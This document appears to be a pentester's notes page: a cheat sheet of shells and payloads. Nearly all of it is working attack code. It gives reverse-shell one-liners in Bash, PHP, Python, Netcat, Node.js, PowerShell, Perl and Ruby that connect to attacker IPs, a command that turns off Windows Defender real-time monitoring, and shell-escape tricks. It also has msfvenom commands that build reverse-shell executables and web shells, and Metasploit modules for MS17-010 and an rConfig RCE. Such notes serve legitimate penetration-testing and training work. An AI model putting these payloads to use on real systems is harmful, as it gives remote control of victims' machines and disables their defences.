Shells and Payloads

Introduction

There are many different ways to "pop" a reverse shell. Check out the different paylads provided in my notes, but keep in mind that there are many different resources online

Useful Resources

Bash Reverse Shells

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

bash -c "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"

0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196

PHP Reverse Shells

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

https://github.com/flast101/reverse-shell-cheatsheet/blob/master/php-reverse-shell.php

Python Reverse Shells

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

__import__("os").system("bash -c 'bash -i >& /dev/tcp/10.0.0.10/666 0>&1'")

Python TTY: python -c 'import pty; pty.spawn("/bin/sh")'

Netcat Reverse Shells

nc 192.168.1.101 5555 -e /bin/bash

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Node.js Reverse Shells

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

JSShell: https://github.com/shelld3v/JSshell

Powershell Payloads

Reverse Shell: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Disable real time monitoring in Windows Defender: Set-MpPreference -DisableRealtimeMonitoring $true

Perl Reverse Shells

perl -e 'exec "/bin/sh";'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shells

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Linux Payloads

Spawn interactive shell: awk 'BEGIN {system("/bin/sh")}' 
Spawn interactive shell: find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
Spawn interactive shell: find . -exec /bin/sh \; -quit 
Spawn interactive shell: vim -c ':!/bin/sh'

Searchsploit

Install & update: sudo apt update && sudo apt install exploitdb
You can serach for exploits using tags such as: searchsploit remote smb microsoft window
Copy a script to the current directory: searchsploit -m windows/remote/48537.py

Msfconsole & Msfvenom

Commands

Description

use exploit/windows/smb/psexec

Metasploit exploit module that can be used on vulnerable Windows system to establish a shell session utilizing smb & psexec

shell

Command used in a meterpreter shell session to drop into a system shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf

MSFvenom command used to generate a linux-based reverse shell stageless payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe

MSFvenom command used to generate a Windows-based reverse shell stageless payload

msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho

MSFvenom command used to generate a MacOS-based reverse shell payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp

MSFvenom command used to generate a ASP web reverse shell payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp

MSFvenom command used to generate a JSP web reverse shell payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war

MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload

use auxiliary/scanner/smb/smb_ms17_010

Metasploit exploit module used to check if a host is vulnerable to ms17_010

use exploit/windows/smb/ms17_010_psexec

Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17_010

use exploit/linux/http/rconfig_vendors_auth_file_upload_rce

Metasploit exploit module that can be used to optain a reverse shell on a vulnerable linux system hosting rConfig 3.9.6

Kali Linux Web Shells

You can find some web shells within Kali Linux, under /usr/share/webshells

PreviousUtilities, Scripts and Payloads NextMetasploit Framework

Last updated 10 months ago

hashtagIntroduction

hashtagUseful Resources

hashtagBash Reverse Shells

hashtagPHP Reverse Shells

hashtagPython Reverse Shells

hashtagNetcat Reverse Shells

hashtagNode.js Reverse Shells

hashtagPowershell Payloads

hashtagPerl Reverse Shells

hashtagRuby Reverse Shells

hashtagLinux Payloads

hashtagSearchsploit

hashtagMsfconsole & Msfvenom

hashtagKali Linux Web Shells